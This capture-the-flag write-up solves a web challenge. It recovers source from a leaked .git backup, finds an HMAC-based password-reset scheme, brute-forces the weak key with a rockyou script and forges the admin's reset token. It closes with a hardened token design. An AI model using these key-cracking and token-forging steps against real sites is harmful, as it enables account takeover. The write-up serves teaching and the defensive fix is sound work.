Rating: 5.0

We have to use the Forgot password feature, so let's check it out.

![forgot_password_check_1](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_4_.png)

![forgot_password_check_2](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_4_.png)

I received an email with a token to reset my password.

I tried doing it again and again.
And guess what? It's the same token every time.

![token_email](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_5.png)

So the token is not random; it must be a deterministic function of my email, some kind of hash of the address with a constant secret (salt) on the server side.

We already know the email of the admin ([email protected]), so we just need to find how it is hashed to get the token and
reset his password.

On the home page there is a link to the [repo](https://github.com/spiders-web/spidersweb) of the challenge. It contains a file `backup.zip`, let's extract it:

```bash
th3jackers$ unzip backup.zip

Archive: backup.zip
inflating: README.md
creating: static/
creating: static/css/
inflating: static/css/foundation.min.css
inflating: static/css/normalize.css
inflating: static/css/main.css
inflating: static/favicon.ico
creating: static/avatars/
inflating: static/avatars/porkey.jpg
inflating: static/avatars/admin.png
inflating: static/avatars/default-avatar.png
inflating: static/avatars/deadpool.jpg
inflating: static/avatars/peterB.png
inflating: static/avatars/peni.jpg
inflating: static/avatars/miles.jpg
inflating: static/avatars/kingpin.jpg
extracting: static/avatars/gwen.png
creating: views/
inflating: views/index.erb
inflating: views/page_visitor.erb
inflating: views/page_user.erb
extracting: views/not_found.erb
creating: .git/
creating: .git/branches/
creating: .git/hooks/
......
```

There is a `.git` folder, how cool is that :3
It contains the git objects, and we can use them to read
old or deleted files with `git cat-file -p OBJECT`.

I used this one-liner to go through all the loose objects and dump them
(Thanks to [this writeup](https://www.mrt-prodz.com/blog/view/2014/09/no-con-name-ctf-quals-2014---miscall-100pts-writeup) for the tip)

```bash
# run from inside .git/objects; errors for the info/ and pack/ entries are harmless
for d in *; do for f in $d/*; do git cat-file -p $d$(basename "$f"); done; done
```
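The same thing can be done without going through `git` at all: a loose object is just `zlib(<type> <size>\0<body>)` stored under `.git/objects/xx/yyyy...`, so a few lines of Python can decompress every one of them and grep for the string you are after. The script below is an added example and not part of the writeup; it builds a throwaway `.git/objects` tree with constructed blobs (the contents are made up to resemble what the writeup finds next) so it runs offline, and it scans a real checkout instead when you pass the repo or `.git` path as the first argument. It only handles loose objects: anything that has been packed under `.git/objects/pack/` still needs `git` itself (e.g. `git cat-file -p` on the SHAs from `git rev-list --all --objects`, or `git fsck --lost-found` for dangling objects).

```python
import hashlib
import os
import re
import sys
import tempfile
import zlib


def object_sha(obj_type, data):
    """SHA-1 git assigns to an object: hash of '<type> <size>\\0' + body."""
    header = f"{obj_type} {len(data)}\0".encode()
    return hashlib.sha1(header + data).hexdigest()


def write_loose_object(git_dir, obj_type, data):
    """Store `data` exactly the way git stores a loose object (used only for the demo)."""
    header = f"{obj_type} {len(data)}\0".encode()
    sha = object_sha(obj_type, data)
    obj_dir = os.path.join(git_dir, "objects", sha[:2])
    os.makedirs(obj_dir, exist_ok=True)
    with open(os.path.join(obj_dir, sha[2:]), "wb") as fh:
        fh.write(zlib.compress(header + data))
    return sha


def _resolve_git_dir(path):
    """Accept either the repo root or its .git directory."""
    nested = os.path.join(path, ".git")
    return nested if os.path.isdir(nested) else path


def iter_loose_objects(git_dir):
    """Yield (sha, type, body) for every loose object under .git/objects/xx/."""
    objects_dir = os.path.join(_resolve_git_dir(git_dir), "objects")
    for entry in os.listdir(objects_dir):
        sub = os.path.join(objects_dir, entry)
        # skip info/ and pack/: packed objects need a packfile parser (or git itself)
        if len(entry) != 2 or not os.path.isdir(sub):
            continue
        for name in os.listdir(sub):
            with open(os.path.join(sub, name), "rb") as fh:
                raw = zlib.decompress(fh.read())
            header, _, body = raw.partition(b"\0")
            obj_type = header.decode().partition(" ")[0]
            yield entry + name, obj_type, body


def grep_blobs(git_dir, pattern):
    """Return [(sha, matching line)] for blob objects whose content matches `pattern`."""
    regex = re.compile(pattern)
    hits = []
    for sha, obj_type, body in iter_loose_objects(git_dir):
        if obj_type != "blob":          # trees and commits are not file contents
            continue
        for line in body.decode("utf-8", errors="replace").splitlines():
            if regex.search(line):
                hits.append((sha, line.strip()))
    return hits


def demo():
    """Build a throwaway .git with constructed blobs and grep them (no real repo needed)."""
    git_dir = os.path.join(tempfile.mkdtemp(), ".git")
    write_loose_object(git_dir, "blob", b"# nothing interesting in this file\n")
    write_loose_object(git_dir, "blob",
                       b'token = OpenSSL::HMAC.hexdigest("SHA256", ENV["SECRET_KEY"], email)\n')
    write_loose_object(git_dir, "blob", b"- change SECRET_KEY to something stronger\n")
    return grep_blobs(git_dir, r"SECRET_KEY|HMAC")


if __name__ == "__main__":
    hits = grep_blobs(sys.argv[1], r"SECRET_KEY|HMAC") if len(sys.argv) > 1 else demo()
    for sha, line in hits:
        print(f"{sha[:12]}  {line}")
```

Because git objects are content-addressed, `object_sha` reproduces git's own IDs, which lets you cross-check a hit with `git cat-file -p <sha>` once you have the repo handy.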

Reading through all the files, I finally found what I was looking for:

```ruby
token = OpenSSL::HMAC.hexdigest("SHA256", ENV["SECRET_KEY"], email)
```

I also found this note:

```
- change SECRET_KEY to something stronger
```

So all that is left to do is to brute-force the key: compute HMAC-SHA256 over my own email with each candidate key and stop when the result equals the token I already have.

I used `rockyou` as the wordlist, here is my Python script:

```python
import hashlib
import hmac

mytoken = "MY_TOKEN"    # the reset token I received for my own account
myemail = b"MY_EMAIL"   # my own email; hmac needs bytes in Python 3

# rockyou is not valid UTF-8, so read it as bytes
with open("/usr/share/wordlists/rockyou.txt", "rb") as f:
    liste = f.read().splitlines()

n = len(liste)
for i, line in enumerate(liste):
    key = line.strip()
    if hmac.new(key, myemail, digestmod=hashlib.sha256).hexdigest() == mytoken:
        print("FOUND: %s" % key.decode("latin-1"))
        break
    print("Trying %d/%d" % (i, n))
```

Running it gives us the key in a few seconds:

```bash
.....
.....
Trying 91398/14344391
Trying 91399/14344391
Trying 91400/14344391
Trying 91401/14344391
Trying 91402/14344391
Trying 91403/14344391
Trying 91404/14344391
FOUND: spiderpig1
```

Let's calculate admin's token now, shall we ?

```python
>>> import hashlib, hmac
>>> print(hmac.new(b"spiderpig1", b"[email protected]", digestmod=hashlib.sha256).hexdigest())

c1971b6fc5eedfa40d5d96a017b9a439c05f2fe8cdc8d48481e00e0c4580db7d
```

Reset the admin password:

![reset_admin_token](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_6.png)

Et voilà

![memehub_flag](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_7.png)

Flag: `shellmates{w3lc0me_2_th3_5pid3r_v3rs3}`
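For contrast, here is what made the attack possible and what a non-forgeable reset token looks like. This is an added example, not the challenge's code or the writeup's: the reset token was a deterministic HMAC of the email under a key weak enough to sit in rockyou, so anyone who knows a victim's address and recovers the key can mint that victim's token offline and at any time. The hardened version draws a fresh token from the OS CSPRNG per request, stores only its hash (so a database leak does not hand out live tokens), makes it single-use and expires it. The in-memory dictionary and the 15-minute TTL are assumptions standing in for a database table and a site policy.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL = 15 * 60  # seconds a reset link stays valid (assumed policy)

# pending resets: sha256(token) -> (email, expires_at); stand-in for a DB table
_pending = {}


def weak_token(secret_key, email):
    """The challenge's scheme: same output for the same email, forever, and
    recoverable by brute force once one (email, token) pair is known."""
    return hmac.new(secret_key.encode(), email.encode(), hashlib.sha256).hexdigest()


def issue_token(email, now=None):
    """Unguessable per-request token; only its hash is persisted server-side."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)                   # 256 bits from the OS CSPRNG
    digest = hashlib.sha256(token.encode()).hexdigest()
    _pending[digest] = (email, now + TOKEN_TTL)
    return token                                        # goes in the email, never stored


def redeem_token(token, now=None):
    """Return the email if the token is valid and unexpired, consuming it; else None."""
    now = time.time() if now is None else now
    digest = hashlib.sha256(token.encode()).hexdigest()
    entry = _pending.pop(digest, None)                  # single-use: gone after first try
    if entry is None:
        return None
    email, expires_at = entry
    if now > expires_at:
        return None
    return email


if __name__ == "__main__":
    # same email, two requests: the weak scheme repeats, the fixed one does not
    print(weak_token("spiderpig1", "me@example.com") == weak_token("spiderpig1", "me@example.com"))
    t1, t2 = issue_token("me@example.com"), issue_token("me@example.com")
    print(t1 != t2, redeem_token(t1), redeem_token(t1))
```

Hashing the token before lookup means the stored value is useless on its own, and popping the entry before the expiry check means an expired token is discarded rather than left lying around. With this scheme there is nothing for an attacker to compute from the admin's email address, and a leaked `SECRET_KEY` no longer translates into an account takeover.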